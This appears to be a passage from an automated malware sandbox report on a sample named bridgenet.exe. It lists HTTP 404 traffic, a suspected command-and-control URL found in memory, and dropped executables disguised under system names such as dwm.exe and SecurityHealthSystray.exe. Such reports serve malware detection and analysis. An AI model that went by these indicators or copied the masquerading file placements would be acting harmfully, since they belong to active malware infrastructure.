0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:34:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5XYcVl0t7o5%2FZojxvQspU5BGAMyChlbrA5PijAuvj8oTE23Ap5BPRzS0SP91fou9qoyOjRqnF7ZZ9AGS8h6Ou0VOgi9VQq%2FLDUoV%2BiL63NsAm1pRveRqZ3%2Fs%2FiXrGtMJXGDMs%2FXHfI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156b9a7ed443b3-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1530&rtt_var=744&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=659439&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:34:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09tmn%2B02CP7pnm752qzymvA5%2B4khjqAymkRPF7ncMipkP%2BApE%2BoYc6N2B8WfF8CzZtXDzWdqc6cYXMBiYheYBUynBgA5v%2BUNtR5NjBc75siub00w28ErL7bL45d6c7xvIFzSckeLTBg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156c355eb9c34f-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=1479&rtt_var=1664&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=609&delivery_rate=246788&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:34:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N23iauiF%2BSjajvE%2FCQ1pwi8RedVAxtRY8pn7JYahe95XLXt2u%2BATAgpjv%2FkJ3Wrp6cRyWQB%2B%2BJEF2SeiIWnxn0l8L6vlMov6VnH9w092S8qypE3Q0nJD%2FZV179iSOSbPmxdcaI%2BZiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156c67cbde727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4318&min_rtt=1940&rtt_var=5483&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=69643&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:35:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYTMW7wgqsfVIlb4LA3FJmb3KogBAo%2FCNBOOl96VmuY0zPh0fszpi%2FqLBGuGyC8XsWotidjA36qILKV3RG1cK9%2FfWxBYkIUkYk3rEY8FcOyfbaa2cBFQgPFgTBxbvKuPApOwVdVQaEQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156c804a63727b-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3917&min_rtt=2010&rtt_var=4569&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=84529&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:35:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mX0m1aTWnFkqTIS1C5wDzkMmqnliKIsqgbQUxiZaa9GaJyOFnpsOWZTeod3FeX2rnmqoG%2BsMSgoor0raxHxUOhG9ZgG0mkbJ%2BWPccyPAT40VVuPS6lmAyfKRxUSZfgjENNHtWlLpWd0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156c93ba60729f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3507&min_rtt=1922&rtt_var=3891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=99972&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.000000000379B000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.0000000003318000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000339A000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000356B000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.000000000388D000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2151681600.0000000003129000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://977255cm.nyashkoon.in
Source: dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://977255cm.nyashkoon.in/
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.0000000003318000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000339A000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1913997239.0000000001216000.00000004.00000020.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://977255cm.nyashkoon.in/secureWindows.php
Source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.0000000003318000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000339A000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepn

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Windows\apppatch\en-US\ed3206c147f2f1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 0_2_00007FF887DA0D48	0_2_00007FF887DA0D48
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 0_2_00007FF887DA0E43	0_2_00007FF887DA0E43
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 13_2_00007FF887D30D48	13_2_00007FF887D30D48
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 13_2_00007FF8880D4CE4	13_2_00007FF8880D4CE4
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 14_2_00007FF887D60D48	14_2_00007FF887D60D48
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D30D48	19_2_00007FF887D30D48
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D40F72	19_2_00007FF887D40F72
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D414C5	19_2_00007FF887D414C5
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D41461	19_2_00007FF887D41461
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D41424	19_2_00007FF887D41424
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D413E0	19_2_00007FF887D413E0
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D4139C	19_2_00007FF887D4139C
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D41358	19_2_00007FF887D41358
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D41314	19_2_00007FF887D41314
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D40ED1	19_2_00007FF887D40ED1
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D412D0	19_2_00007FF887D412D0
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D412AB	19_2_00007FF887D412AB
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D610E5	19_2_00007FF887D610E5
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D6CC88	19_2_00007FF887D6CC88
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D40ED1	20_2_00007FF887D40ED1
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D30D48	20_2_00007FF887D30D48
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D610E5	20_2_00007FF887D610E5
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D6CC88	20_2_00007FF887D6CC88
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D7E29B	21_2_00007FF887D7E29B
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D30D48	21_2_00007FF887D30D48
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D40F72	21_2_00007FF887D40F72
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D414C5	21_2_00007FF887D414C5
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D41461	21_2_00007FF887D41461
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D41424	21_2_00007FF887D41424
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D413E0	21_2_00007FF887D413E0
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D4139C	21_2_00007FF887D4139C
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D41358	21_2_00007FF887D41358
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D41314	21_2_00007FF887D41314
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D40ED1	21_2_00007FF887D40ED1
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D412D0	21_2_00007FF887D412D0
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D412AB	21_2_00007FF887D412AB
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D610E5	21_2_00007FF887D610E5
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D6D020	21_2_00007FF887D6D020
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF8880D4CE4	21_2_00007FF8880D4CE4
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 26_2_00007FF887EA0D48	26_2_00007FF887EA0D48
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 26_2_00007FF887EA0E43	26_2_00007FF887EA0E43
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 26_2_00007FF888244D39	26_2_00007FF888244D39
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 31_2_00007FF887E90D48	31_2_00007FF887E90D48
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 31_2_00007FF887E90E43	31_2_00007FF887E90E43
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 31_2_00007FF888234CE4	31_2_00007FF888234CE4
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 36_2_00007FF887E80D48	36_2_00007FF887E80D48
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 36_2_00007FF887E80E43	36_2_00007FF887E80E43
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 36_2_00007FF888224CE4	36_2_00007FF888224CE4
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 43_2_00007FF887EC0D48	43_2_00007FF887EC0D48
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 43_2_00007FF887EC0E43	43_2_00007FF887EC0E43
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 43_2_00007FF888264D39	43_2_00007FF888264D39
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E80D48	48_2_00007FF887E80D48
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E80E43	48_2_00007FF887E80E43
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E90E26	48_2_00007FF887E90E26
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E914C5	48_2_00007FF887E914C5
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E91461	48_2_00007FF887E91461
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E91424	48_2_00007FF887E91424
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E913E0	48_2_00007FF887E913E0
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E9139C	48_2_00007FF887E9139C
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E91358	48_2_00007FF887E91358
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E91314	48_2_00007FF887E91314
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E912D0	48_2_00007FF887E912D0
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E912AB	48_2_00007FF887E912AB
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E91A9E	48_2_00007FF887E91A9E
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887ECE29B	48_2_00007FF887ECE29B
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887EB10E5	48_2_00007FF887EB10E5
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF888224CE4	48_2_00007FF888224CE4
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EB1070	49_2_00007FF887EB1070
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EB0ED1	49_2_00007FF887EB0ED1
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EB15CB	49_2_00007FF887EB15CB
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887ED10E5	49_2_00007FF887ED10E5
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EDCC88	49_2_00007FF887EDCC88
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EA0D48	49_2_00007FF887EA0D48
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EA0E43	49_2_00007FF887EA0E43
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887ED10E5	54_2_00007FF887ED10E5
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887EDCC88	54_2_00007FF887EDCC88
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887EB0ED1	54_2_00007FF887EB0ED1
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887EA0D48	54_2_00007FF887EA0D48
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887EA0E43	54_2_00007FF887EA0E43
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED0E26	55_2_00007FF887ED0E26
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED14C5	55_2_00007FF887ED14C5
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED1461	55_2_00007FF887ED1461
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED1424	55_2_00007FF887ED1424
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED13E0	55_2_00007FF887ED13E0
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED139C	55_2_00007FF887ED139C
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED1358	55_2_00007FF887ED1358
